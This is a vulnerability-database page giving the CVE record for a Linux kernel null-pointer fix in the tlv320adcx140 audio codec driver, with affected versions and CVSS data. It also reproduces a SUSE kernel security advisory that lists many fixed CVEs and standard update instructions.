Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-23006 (GCVE-0-2026-23006)
Vulnerability from cvelistv5 – Published: 2026-01-25 14:36 – Updated: 2026-02-09 08:36
VLAI?
EPSS
Title
ASoC: tlv320adcx140: fix null pointer
Summary
In the Linux kernel, the following vulnerability has been resolved:
ASoC: tlv320adcx140: fix null pointer
The "snd_soc_component" in "adcx140_priv" was only used once but never
set. It was only used for reaching "dev" which is already present in
"adcx140_priv".
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
4e82971f7b556cff3491c867e8840e7d788693b9 , < 954260a32c21d5072d8e7253c0a8b1627927cb02
(git)
Affected: 4e82971f7b556cff3491c867e8840e7d788693b9 , < 659939d08e5f7bc17b941c53e8c9c0a6c6113b21 (git) Affected: 4e82971f7b556cff3491c867e8840e7d788693b9 , < 61757f5191daab863d25f03680e912b5449a1eed (git) Affected: 4e82971f7b556cff3491c867e8840e7d788693b9 , < 53bd838ed5950cb18927e4b2e8ee841b7cb10929 (git) Affected: 4e82971f7b556cff3491c867e8840e7d788693b9 , < be7664c81d3129fc313ef62ff275fd3d33cfecd4 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/soc/codecs/tlv320adcx140.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "954260a32c21d5072d8e7253c0a8b1627927cb02",
"status": "affected",
"version": "4e82971f7b556cff3491c867e8840e7d788693b9",
"versionType": "git"
},
{
"lessThan": "659939d08e5f7bc17b941c53e8c9c0a6c6113b21",
"status": "affected",
"version": "4e82971f7b556cff3491c867e8840e7d788693b9",
"versionType": "git"
},
{
"lessThan": "61757f5191daab863d25f03680e912b5449a1eed",
"status": "affected",
"version": "4e82971f7b556cff3491c867e8840e7d788693b9",
"versionType": "git"
},
{
"lessThan": "53bd838ed5950cb18927e4b2e8ee841b7cb10929",
"status": "affected",
"version": "4e82971f7b556cff3491c867e8840e7d788693b9",
"versionType": "git"
},
{
"lessThan": "be7664c81d3129fc313ef62ff275fd3d33cfecd4",
"status": "affected",
"version": "4e82971f7b556cff3491c867e8840e7d788693b9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/soc/codecs/tlv320adcx140.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.122",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.67",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.162",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.122",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.67",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.7",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19",
"versionStartIncluding": "6.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\"."
}
],
"providerMetadata": {
"dateUpdated": "2026-02-09T08:36:58.851Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/954260a32c21d5072d8e7253c0a8b1627927cb02"
},
{
"url": "https://git.kernel.org/stable/c/659939d08e5f7bc17b941c53e8c9c0a6c6113b21"
},
{
"url": "https://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed"
},
{
"url": "https://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929"
},
{
"url": "https://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4"
}
],
"title": "ASoC: tlv320adcx140: fix null pointer",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2026-23006",
"datePublished": "2026-01-25T14:36:19.819Z",
"dateReserved": "2026-01-13T15:37:45.939Z",
"dateUpdated": "2026-02-09T08:36:58.851Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-23006\",\"sourceIdentifier\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"published\":\"2026-01-25T15:15:55.480\",\"lastModified\":\"2026-03-25T19:21:56.440\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In the Linux kernel, the following vulnerability has been resolved:\\n\\nASoC: tlv320adcx140: fix null pointer\\n\\nThe \\\"snd_soc_component\\\" in \\\"adcx140_priv\\\" was only used once but never\\nset. It was only used for reaching \\\"dev\\\" which is already present in\\n\\\"adcx140_priv\\\".\"},{\"lang\":\"es\",\"value\":\"En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\\n\\nASoC: tlv320adcx140: correcci\u00f3n de puntero nulo\\n\\nEl \u0027snd_soc_component\u0027 en \u0027adcx140_priv\u0027 solo se us\u00f3 una vez pero nunca se configur\u00f3. Solo se us\u00f3 para alcanzar \u0027dev\u0027, que ya est\u00e1 presente en \u0027adcx140_priv\u0027.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-476\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.1.1\",\"versionEndExcluding\":\"6.1.162\",\"matchCriteriaId\":\"FC8A14F3-D16F-4AB8-A56B-58BFF0518CEE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.2\",\"versionEndExcluding\":\"6.6.122\",\"matchCriteriaId\":\"8EAAE395-0162-4BAF-9AD5-E9AF3C869C4F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.7\",\"versionEndExcluding\":\"6.12.67\",\"matchCriteriaId\":\"7456F614-6AA8-4C08-8229-BA342D4AFBAD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.13\",\"versionEndExcluding\":\"6.18.7\",\"matchCriteriaId\":\"99FF3E05-0E7A-44E9-8E47-BF6F1F8EC436\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.1:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"DE093B34-F4CD-4052-8122-730D6537A91A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"17B67AA7-40D6-4AFA-8459-F200F3D7CFD1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"C47E4CC9-C826-4FA9-B014-7FE3D9B318B2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"F71D92C0-C023-48BD-B3B6-70B638EEE298\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*\",\"matchCriteriaId\":\"13580667-0A98-40CC-B29F-D12790B91BDB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*\",\"matchCriteriaId\":\"CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*\",\"matchCriteriaId\":\"3EF854A1-ABB1-4E93-BE9A-44569EC76C0D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*\",\"matchCriteriaId\":\"F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*\",\"matchCriteriaId\":\"EB5B7DFC-C36B-45D8-922C-877569FDDF43\"}]}]}],\"references\":[{\"url\":\"https://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/659939d08e5f7bc17b941c53e8c9c0a6c6113b21\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/954260a32c21d5072d8e7253c0a8b1627927cb02\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]}]}}"
}
}
SUSE-SU-2026:20599-1
Vulnerability from csaf_suse - Published: 2026-02-27 11:51 - Updated: 2026-02-27 11:51Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise 16.0 and SL MIxro 6.2 kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2025-40147: blk-throttle: fix access race during throttle policy activation (bsc#1253344).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68211: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item (bsc#1255319).
- CVE-2025-68218: nvme-multipath: fix lockdep WARN due to partition scan work (bsc#1255245).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68341: veth: reduce XDP no_direct return section to fix race (bsc#1255506).
- CVE-2025-68348: block: fix memory leak in __blkdev_issue_zero_pages (bsc#1255694).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68356: gfs2: Prevent recursive memory reclaim (bsc#1255593).
- CVE-2025-68359: btrfs: fix double free of qgroup record after failure to add delayed ref head (bsc#1255542).
- CVE-2025-68360: wifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks (bsc#1255536).
- CVE-2025-68361: erofs: limit the level of fs stacking for file-backed mounts (bsc#1255526).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68368: md: init bioset in mddev_init (bsc#1255527).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).
- CVE-2025-68376: coresight: ETR: Fix ETR buffer use-after-free issue (bsc#1255529).
- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68735: drm/panthor: Prevent potential UAF in group creation (bsc#1255811).
- CVE-2025-68741: scsi: qla2xxx: Fix improper freeing of purex item (bsc#1255703).
- CVE-2025-68743: mshv: Fix create memory region overlap check (bsc#1255708).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68784: xfs: fix a UAF problem in xattr repair (bsc#1256793).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68792: tpm2-sessions: Fix out of range indexing in name_size (bsc#1256656).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68799: caif: fix integer underflow in cffrml_receive() (bsc#1256643).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: NFSD: NFSv4 file creation neglects setting ACL (bsc#1256770).
- CVE-2025-68811: svcrdma: use rc_pageoff for memcpy byte offset (bsc#1256677).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-68821: fuse: fix readahead reclaim deadlock (bsc#1256667).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71126: mptcp: avoid deadlock on fallback while reinjecting (bsc#1256755).
- CVE-2025-71132: smc91x: fix broken irq-context in PREEMPT_RT (bsc#1256737).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix "UBSAN: shift-out-of-bounds error" (bsc#1256760).
- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).
- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22981: idpf: detach and close netdevs while handling a reset (bsc#1257225).
- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22986: gpiolib: fix race condition for gdev->srcu (bsc#1257276).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
The following non security issues were fixed:
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- Add bugnumber to an existing hv_netvsc change (bsc#1257473).
- Fix locking issue introduced by a CVE backport (bsc#1256975 bsc#1254977).
- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)
- arm64: Update config files. Disable DEVPORT (bsc#1256792)
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- btrfs: pass fs_info to btrfs_delete_ref_head() (git-fixes).
- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).
- bus: fsl-mc: Constify fsl_mc_device_match() (jsc#PED-10906 git-fixes).
- drm/imagination: Wait for FW trace update command completion (git-fixes).
- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- libbpf: Fix -Wdiscarded-qualifiers under C23 (bsc#1257309).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).
- net: mana: Fix incorrect speed reported by debugfs (bsc#1255232).
- net: mana: Support HW link state events (bsc#1253049).
- nfsd: adjust WARN_ON_ONCE in revoke_delegation (bsc#1257015).
- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- sched/fair: Disable scheduler feature NEXT_BUDDY (bsc#1255459).
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256864).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256864).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).
- slimbus: core: Constify slim_eaddr_equal() (jsc#PED-10906 git-fixes).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- tsm-mr: Add TVM Measurement Register support (bsc#1257504).
- tsm-mr: Add tsm-mr sample code (bsc#1257504).
- virt: tdx-guest: Expose TDX MRs as sysfs attributes (bsc#1257504).
- virt: tdx-guest: Refactor and streamline TDREPORT generation (bsc#1257504).
- virt: tdx-guest: Transition to scoped_cond_guard for mutex operations (bsc#1257504).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- x86/tdx: Add tdx_mcall_extend_rtmr() interface (bsc#1257504).
- x86/tdx: tdx_mcall_get_report0: Return -EBUSY on TDCALL_OPERAND_BUSY error (bsc#1257504).
Patchnames: SUSE-SLES-16.0-325
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
